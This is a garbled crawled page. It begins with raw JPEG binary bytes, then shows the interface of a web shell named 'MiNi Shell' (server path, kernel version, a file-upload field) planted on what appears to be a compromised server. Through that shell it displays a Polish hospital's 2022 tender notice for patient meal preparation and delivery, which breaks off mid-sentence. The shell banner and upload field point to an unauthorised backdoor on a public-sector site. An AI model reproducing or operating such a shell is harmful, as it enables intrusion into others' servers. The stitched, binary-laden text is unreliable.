JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220623/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220623/0022155501-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> PRZYGOTOWYWANIE I DOSTAWĘ POSIŁKÓW DLA PACJENTÓW <br/>SP ZOZ W SULECHOWIE </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Samodzielny Publiczny Zakład Opieki Zdrowotnej w Sulechowie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000310396</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Zwycięstwa, 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Sulechów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">66-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubuskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL432 - Zielonogórski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">spzoz@spzozsulechow.med.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://spzozsulechow.med.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - samodzielny publiczny zakład opieki zdrowotnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> PRZYGOTOWYWANIE I DOSTAWĘ POSIŁKÓW DLA PACJENTÓW <br/>SP ZOZ W SULECHOWIE </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-e3df24c9-f2e4-11ec-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00221555</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-06-23</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00028644/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 Przygotowywanie i dostawę posiłków dla pacjentów SP ZOZ w Sulechowie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://bip.wrota.lubuskie.pl/spzoz_sulechow/zamowienia_publiczne/11/status/rodzaj/wzp/zwr/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja między zamawiającym, a wykonawcami odbywa się przy użyciu środków komunikacji elektronicznej tj.:<br/>	miniPortalhttps://miniportal.uzp.gov.pl/,<br/>	ePUAPhttps://epuap.gov.pl/wps/portal, <br/>	poczta elektroniczna zamowienia@spzozsulechow.med.pl<br/>Zamawiający nie dopuszcza składania oferty za pomocą poczty elektronicznej z wyjątkiem przedmiotowych środków dowodowych.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">3.	Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do następujących formularzy: <br/>„Formularz do złożenia, zmiany, wycofania oferty lub wniosku”<br/>„Formularz do komunikacji”.<br/>4.	Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w regulaminie korzystania z systemu miniPortal: miniPortal (uzp.gov.pl) oraz w warunkach korzystania z elektronicznej platformy usług administracji publicznej (ePUAP).<br/>5.	Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy: „Formularz złożenia, zmiany, wycofania oferty lub wniosku” i „Formularz do komunikacji” wynosi 150 MB. <br/>6.	Załączniki do formularza komunikacji muszą być zgodne z obowiązującym KRI - Rozporządzenie Rady Ministrów z dnia 12 kwietnia 2012 r. w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych. Rekomendowany format danych .doc, .docx, .rtf, .pdf, .zip.<br/>7.	Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na ePUAP.<br/>8.	Dane postępowanie można wyszukać na liście wszystkich postępowań w miniPortalu klikając wcześniej opcję „Dla Wykonawców” lub ze strony głównej z zakładki Postępowania.<br/>9.	Oferty, oświadczenia, o których mowa w art. 125 ust. 1 ustawy, podmiotowe środki dowodowe, w tym oświadczenie, o którym mowa w art. 117 ust. 4 ustawy PZP, oraz zobowiązanie podmiotu udostępniającego zasoby, o którym mowa w art. 118 ust. 3 ustawy PZP, pełnomocnictwo, sporządza się w postaci elektronicznej, w formatach danych określonych w przepisach wydanych na podstawie art. 18 ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne (Dz. U. z 2021 r. poz. 670), z zastrzeżeniem formatów, o których mowa w art. 66 ust. 1 ustawy PZP, z uwzględnieniem rodzaju przekazywanych danych.<br/>10.	Informacje, oświadczenia lub dokumenty, inne niż określone w ppkt. 9, przekazywane w postępowaniu, sporządza się w postaci elektronicznej, w formatach danych określonych w przepisach wydanych na podstawie art. 18 ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne lub jako tekst wpisany bezpośrednio do wiadomości przekazywanej przy użyciu środków komunikacji elektronicznej, o których mowa w § 3 ust. 1 rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie.<br/>11.	Wykonawca podpisując podpisem elektronicznym ofertę oraz inne dokumenty przekazywane zamawiającemu może zastosować podpis zarówno w formacie pliku XAdES (typ zewnętrzny) jak i w formacie pliku PAdES.<br/>W przypadku podpisu dokonanego w formacie pliku XAdES format xml dokumentu musi być przechowywany i przekazywany dalej z plikiem źródłowym zawierającym dane. Konieczne jest wysłanie pary plików: źródłowego i podpisanego. Przekazanie pliku z danymi bez pliku z podpisem jest równoznaczne ze złożeniem niepodpisanych dokumentów. W przypadku użycia formatu PAdES otaczający podpis zawarty jest w jednym pliku stanowiącym dokument podpisywany.<br/>Pozostałe informacje z SWZ pkt. III</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">KLAUZULA INFORMACYJNA DOTYCZĄCA PRZETWARZANIA DANYCH OSOBOWYCH<br/>DLA UCZESTNIKÓW POSTĘPOWANIA O UDZIELENIE ZAMÓWIENIA PUBLICZNEGO<br/>1. ADMINISTRATOR DANYCH OSOBOWYCH I JEGO DANE KONTAKTOWE<br/>Administratorem danych osobowych jest Samodzielny Publiczny Zakład Opieki Zdrowotnej w Sulechowie, którego reprezentuje Beata Kucuń –<br/>Dyrektor. Kontakt z nim możliwy jest:<br/>➢ drogą korespondencyjną: ul. Zwycięstwa 1, 66-100 Sulechów,<br/>➢ drogą mailową: spzoz@spzozsulechow.med.pl,<br/>➢ telefonicznie: 797 606 252, 797 602 253.<br/>2. OSOBA KONTAKTOWA DS. PRZETWARZANIA DANYCH OSOBOWYCH I JEJ DANE KONTAKTOWE<br/>Inspektor Ochrony Danych, z którym kontakt możliwy jest:<br/>➢ drogą korespondencyjną: ul. Zwycięstwa 1, 66-100 Sulechów,<br/>➢ drogą mailową: iod@spzozsulechow.med.pl.<br/>3. CEL PRZETWARZANIA DANYCH OSOBOWYCH I PODSTAWA PRAWNA PRZETWARZANIA DANYCH OSOBOWYCH<br/>Cel:<br/>➢ przeprowadzenie postępowania o udzielenie zamówienia publicznego.<br/>Podstawa prawna:<br/>➢ przepis prawa, w oparciu o który realizujemy nasze obowiązki prawne i uprawnienia (art. 6 ust. 1 lit. c rozporządzenia 2016/679*, przepisy<br/>ustawy o świadczeniach opieki zdrowotnej finansowanych ze środków publicznych, ustawy o działalności leczniczej, ustawy Prawo zamówień <br/>publicznych, ustawy o finansach publicznych, ustawy Ordynacja podatkowa, ustawy o rachunkowości).<br/>Cel:<br/>➢ archiwizowanie dokumentacji.<br/>Podstawa prawna:<br/>➢ przepis prawa, w oparciu o który realizujemy nasze obowiązki prawne (art. 6 ust. 1 lit. c rozporządzenia 2016/679, przepisy ustawy o <br/>narodowym zasobie archiwalnym i archiwach).<br/>4. OBOWIĄZEK PODANIA DANYCH OSOBOWYCH:<br/>Obowiązek podania danych osobowych jest wymogiem ustawowym określonym w przepisach ustawy z dnia 29 stycznia 2004 r. Prawo zamówień <br/>publicznych związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego. Konsekwencje niepodania określonych danych wynikają <br/>z tej ustawy. Niepodanie danych może skutkować brakiem możliwości wzięcia udziału w postępowaniu.<br/>5. ODBIORCY DANYCH OSOBOWYCH<br/>Odbiorcą Twoich danych osobowych mogą być:<br/>➢ podmioty upoważnione na podstawie przepisów prawa, w tym organy ścigania (jak Policja i Prokuratura), sądy, podmioty, którym <br/>udostępniona zostanie dokumentacja postępowania w oparciu o przepisy ustawy z dnia 29 stycznia 2004 r. – Prawo zamówień publicznych, <br/>Prezes Urzędu Zamówień Publicznych, Krajowa Izba Odwoławcza;<br/>➢ podmioty, które na podstawie odrębnie zawartych umów współpracują z nami, dostawcy usług zaopatrujących nas w rozwiązania techniczne, <br/>organizacyjne i informatyczne, w tym umożliwiające nam zarządzanie i funkcjonowanie;<br/>➢ audytorzy, kontrolerzy lub podmioty upoważnione z mocy przepisów prawa do dokonywania kontroli;<br/>➢ dostawcy usług pocztowych lub kurierskich;<br/>➢ kancelarie prawne współpracujące z nami.<br/>6. SPRZECIW WOBEC PRZETWARZANIA DANYCH OSOBOWYCH<br/>Nie przysługuje Ci prawo wniesienia sprzeciwu na podstawie art. 21 rozporządzenia 2016/679, wobec przetwarzania danych osobowych, gdyż <br/>podstawą prawną przetwarzania danych osobowych jest niezbędność do realizacji obowiązków prawnych ciążących na nas, a więc art. 6 ust. <br/>1 lit. c rozporządzenia 2016/679.<br/>7. TWOJE UPRAWNIENIA W ZWIĄZKU Z PRZETWARZANIEM TWOICH DANYCH OSOBOWCH<br/>Przysługuje Ci prawo:<br/>➢ dostępu do swoich danych osobowych na podstawie art. 15 rozporządzenia 2016/679 [1] oraz otrzymania ich kopii;<br/>➢ sprostowania i uzupełnienia swoich danych osobowych na podstawie art. 16 rozporządzenia 2016/679 [2];<br/>➢ żądania ograniczenia przetwarzania swoich danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 1 i 2 <br/>rozporządzenia 2016/679 [3];<br/>Nie przysługuje Ci prawo:<br/>➢ usunięcia danych osobowych w związku z art. 17 ust. 3 lit. b, d lub e rozporządzenia 2016/679;<br/>➢ przenoszenia danych osobowych, o którym mowa w art. 20 rozporządzenia 2016/679.<br/>Pozostałe informacje w załączniku do SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">12/ZP-PN/2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest usługa w zakresie codziennego i całodziennego przygotowania i dostawy posiłków dla pacjentów SP ZOZ w Sulechowie.<br/>2.	Wykonawca zobowiązany będzie do prowadzenia usługi żywienia zbiorowego w ochronie zdrowia z zachowaniem zasad dobrej praktyki higienicznej, zasad dobrej praktyki produkcyjnej oraz stosować wdrażane zasady systemu HACCP. Wykonawca zobowiązany będzie również w trakcie realizacji zamówienia zapewnić jakość wyżywienia zgodną z zaleceniami dotyczącymi norm oraz składników pokarmowych i produktów spożywczych przypisanych placówkom służby zdrowia z uwzględnieniem stosowanych diet, technologii przygotowania posiłków, wydanych przez Instytut Żywności i Żywienia w Warszawie, szczególnie w zakresie wartości odżywczych, urozmaicenia, objętości i gramatury potraw. Produkcja i dystrybucja posiłków winna gwarantować bezpieczeństwo sanitarne i epidemiologiczne. Produkcja posiłków winna odbywać się z produktów świeżych, najwyższej jakości, posiadających dokumenty dopuszczające je do spożywania, z zachowaniem reżimów dietetycznych i sanitarnych obowiązujących w szpitalach – zgodnie z obowiązującymi przepisami.<br/>3.	Zakres świadczenia usług:<br/>1)	Przygotowywanie, gotowanie posiłków wg norm i zasad żywienia przypisanych placówkom służby zdrowia, w ilościach wynikających ze stanu hospitalizowanych z uwzględnieniem zaleceń dietetycznych, oraz płatnych posiłków dla zainteresowanych pracowników, zgodnie <br/>z zasadami systemu HACCP:<br/>- kaloryczność nie mniej niż 2300 kalorii;<br/>- temperatury dostarczanych posiłków:<br/>a)	wędliny od 0 do +4C<br/>b)	nabiał od 0 do +8C<br/>c)	zupa nie mniej niż +70C<br/>d)	ziemniaki, ryż, kasze itp. nie mniej niż 70C<br/>e)	mięso, gulasze nie mniej niż 65C<br/>- poziom składników odżywczych:<br/>a)	zgodnie z załączonym przykładowym jadłospisem – załącznik nr 1a do SWZ;<br/>•	co najmniej 3 x w tygodniu powinna być podana cała porcja mięsa (w tym w niedzielę – obowiązkowo), nie gulasz i pulpet<br/>•	dla diet specjalnych 2 rodzaje surówek, mogą być również warzywa po obróbce termicznej<br/>•	dla diety cukrzycowej oraz podwieczorku powinny być urozmaicone różnymi produktami i nie powtarzać się w ciągu 5 kolejnych dni<br/>•	w jadłospisach śniadań i kolacji oprócz składników podstawowych muszą znajdować się dodatkowo świeże warzywa, owoce bądź ich przetwory<br/>•	pieczywo – żytnie, pszenne lub razowe (zgodnie z zamówionymi dietami)<br/>•	do smarowania pieczywa należy dostarczyć masło<br/>•	posiłki powinny być uzupełnione dodatkami takimi jak sól, cukier, musztarda, ketchup itp. (dostarczane w codziennych porcjach, odpowiednio do złożonych zamówień posiłków). Uzupełnianie posiłków dodatkami, odbywać się będzie na etapie porcjowania<br/>•	sporządzane posiłki muszą odpowiadać wszelkim rygorom recepturowym, smakowym, estetycznym oraz zdrowotnym przy szczególnym zachowaniu norm dziennych racji żywieniowych dla placówek służb zdrowia.<br/>2)	Dostarczanie posiłków do Zamawiającego pod adresy: Sulechów, ul. Zwycięstwa 1 oraz al. Niepodległości 19.<br/>3)	W zakresie przygotowywania posiłków Wykonawca zobowiązany jest do stosowania się do zasad określonych w załączniku nr 1d<br/>4)	Dostarczanie pojemników z posiłkami do kuchenek oddziałowych winno odbywać się w sposób gwarantujący zachowanie właściwej temperatury, czystości i jakości posiłków, tj. przy użyciu wózków transportowych, kontenerów, bemarów i innych tego typu odpowiednich urządzeń. <br/>a)	Po wyładowaniu posiłków puste termosy itp. przekazywane są od razu kierowcy.<br/>b)	Za należyte utrzymanie kuchenek oddziałowych odpowiada Zamawiający. Rozdzielenie posiłków należy do Zamawiającego.<br/>c)	Zamawiający zapewnia zastawę stołową poza sprzętem wymienionym w pkt. I.3. ppkt 13) i 22) który pozostaje własnością Wykonawcy.<br/>d)	Zamawiający nie posiada pomieszczenia, które może być udostępnione Wykonawcy na potrzeby związane z dostawą posiłków.<br/>e)	W przypadku, kiedy Wykonawca zaplanuje w jadłospisie kolację, która nie będzie zawierała dań podawanych na ciepło – gorąco, nie będzie można dostarczyć jej razem z obiadem i podwieczorkiem w jednym transporcie, ponieważ Zamawiający nie posiada możliwości przechowywania posiłków.<br/>f)	Nie istnieją jakiekolwiek bariery architektoniczne uniemożliwiające bądź utrudniające dostarczenie posiłków.<br/>g)	Zamawiający nie przewiduje zmiany ilości łóżek szpitalnych.<br/>5)	Wykonawca ma dostarczyć posiłki własnym transportem, którego koszt ma być wliczony w cenę oferty.<br/>6)	Jeśli Wykonawca nie dostarczy posiłków lub nie dostarczy odpowiedniej ilości posiłków <br/>do określonej w SWZ i w umowie godziny, Zamawiający ma prawo zamówić posiłki w trybie pilnym u innego dostawcy na koszt Wykonawcy. Wykonawca jest zobowiązany pokryć całkowity koszt dostawy posiłków zamówionych u innego dostawcy.<br/>7) Jadłospis dekadowy sporządzany ma być przez dietetyka, a zatwierdzony przez dietetyka zatrudnionego w SPZOZ lub inną osobę wskazaną z ramienia szpitala i zawierać wszystkie wymagane diety tj. m.in. dietę podstawową, lekkostrawną, płynną, cukrzycową, żołądkową, trzustkową, wegetariańską, jako opcję możliwą do wyboru przez pacjenta do diet powyższych oraz informacje o zawartych w nich alergenach<br/>8) Wyżywienie zgodne z zleceniami dotyczącymi norm oraz składników pokarmowych i produktów spożywczych przypisanych placówkom służby zdrowia z uwzględnieniem stosowanych diet, technologii przygotowania posiłków, wydanych przez Instytut Żywności i Żywienia w Warszawie, szczególnie w zakresie wartości odżywczych, urozmaicenia, objętości i gramatury potraw. Produkcja posiłków winna odbywać się z produktów świeżych, najwyższej jakości, posiadających dokumenty dopuszczające je do spożywania, z zachowaniem reżimów dietetycznych oraz sanitarnych, obowiązujących w szpitalach<br/> - zgodnie z obowiązującymi przepisami.<br/>9)	Usługa musi być realizowana zgodnie z wymogami określonymi w:<br/>•	Rozporządzenie Ministra Zdrowia z dnia 26 czerwca 2012 r. w sprawie szczegółowych wymagań, jakim powinny odpowiadać pomieszczenia i urządzenia podmiotu wykonującego działalność leczniczą (Dz.U. z 2022 poz.402).<br/>•	Ustawa z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (t.j. Dz. U. z 2020 r. poz. 2021, z 2022r. poz. 24, 138).<br/>•	Zasadami systemu HACCP.<br/>10) Posiłki dostarczane mają być bezpośrednio do poszczególnych oddziałów szpitala (kuchenki oddziałowe) w Sulechowie w systemie termosowym – diety muszą być dostarczane <br/>w oddzielnych opisanych pojemnikach. Dostarczanie posiłków 3 x dziennie w systemie śniadanie, obiad, kolacja. <br/>•	Śniadanie od godz. 7.45 do godz. 8.15<br/>•	Obiad (w diecie cukrzycowej + podwieczorek) od godz. 12.45 do godz. 13.15<br/>•	Kolacja od godz. 16.45 do godz. 17.15<br/>11)	Warunki przechowywania posiłków, transport oraz sposób przygotowania pożywienia muszą spełniać wszelkie wymogi sanitarno – epidemiologiczne.<br/>12)	Ogólna informacja o Zamawiającym:<br/>Szpital SP ZOZ w Sulechowie składa się z 5 oddziałów:<br/>•	Oddział Chirurgii Ogólnej i Onkologicznej<br/>•	Oddział Położniczo – Ginekologiczny<br/>•	Oddział Wewnętrzny<br/>•	Oddział Rehabilitacji <br/>•	Oddział Anestezjologii i Intensywnej Terapii<br/>Ilość łóżek szpitalnych łącznie: 171 z czego 156 pacjentów objętych żywieniem, <br/>Oddziały szpitalne zlokalizowane są w dwóch niezależnych budynkach, każdy oddział posiada kuchenkę oddziałową.<br/>Dla pacjentów, którym przepisana jest dieta cukrzycowa do dziennego wyżywienia zapewniony będzie czwarty posiłek, tj. podwieczorek. <br/>13)	Posiłki winny być dostarczane zgodnie z jadłospisem i dostarczane w systemie termosowym bezpośrednio do kuchenek oddziałowych <br/>14)	Ponadto Wykonawca musi zabezpieczyć personel wydający posiłki w nabierki i inne narzędzia potrzebne do nakładania posiłków, dzbanki do napoi, wagi kuchenne, pojemniki na odpady pokonsumpcyjne i worki koloru niebieskiego na odpady pokonsumpcyjne.<br/>15)	Wykonawca zobowiązany jest do przechowywania z każdego dnia próbek żywnościowych <br/>z poszczególnych diet zgodnie z obowiązującymi przepisami.<br/>16)	Koszt surowców zużywalnych do przygotowania posiłków w cenie posiłków, nie może być niższy niż 50% stawki netto.<br/>17)	Zamawiający zastrzega sobie prawo do okresowej kontroli w zakresie:<br/>•	zgodności dostarczanych posiłków z wymogami Zamawiającego pod względem wagowym (gramówka)<br/>•	podtrzymania odpowiedniej temperatury dostarczanych posiłków zgodnie <br/>z obowiązującymi przepisami.<br/>•	przygotowania posiłków w miejscach wskazanych przez Wykonawcę. Kontrolę <br/>w miejscach przygotowywania posiłków będzie przeprowadzał specjalista ds. epidemiologii zatrudniony przez Zamawiającego lub dietetyk wskazany przez Zamawiającego. Kontrola będzie dotyczyła zgodności przygotowywania posiłków z niniejszą umową. Z kontroli zostanie sporządzony protokół w dwóch jednobrzmiących egzemplarzach, dla każdej strony po jednym.<br/>18)	Nadzór nad jakością, ilością i przestrzeganiem obowiązujących norm i uzgodnień <br/>oraz realizacją postanowień zawartych w umowie, sprawować 